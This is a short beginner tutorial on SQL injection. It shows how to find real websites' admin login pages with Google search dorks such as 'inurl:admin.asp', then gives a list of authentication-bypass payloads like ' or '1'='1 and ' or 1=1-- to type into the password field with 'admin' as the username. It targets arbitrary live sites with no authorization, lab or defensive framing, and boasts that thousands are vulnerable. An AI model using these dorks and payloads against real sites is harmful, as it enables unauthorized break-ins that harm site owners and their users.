SQL injection Tutorial For beginners

1: What is SQL injection?

2: SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application.

3: First let us find out our target for SQL injection.

4: Open Uncle Google and type "inurl:admin.asp" and press Enter.

5: You will get list of sites like "www.Sitename.com/admin.asp, just click on any such site

6: And the other keywords to find the target are

"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"

Once its opened it will promt for username and pwd.

8: We always give the username as "admin" and password we type our sql injection as follows.

' or '1'='1

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'

9: And click on submit and you can see you are in...........! cool ..?

10: Please note all sites are not vulnerable. But you can find thousands of such sites....!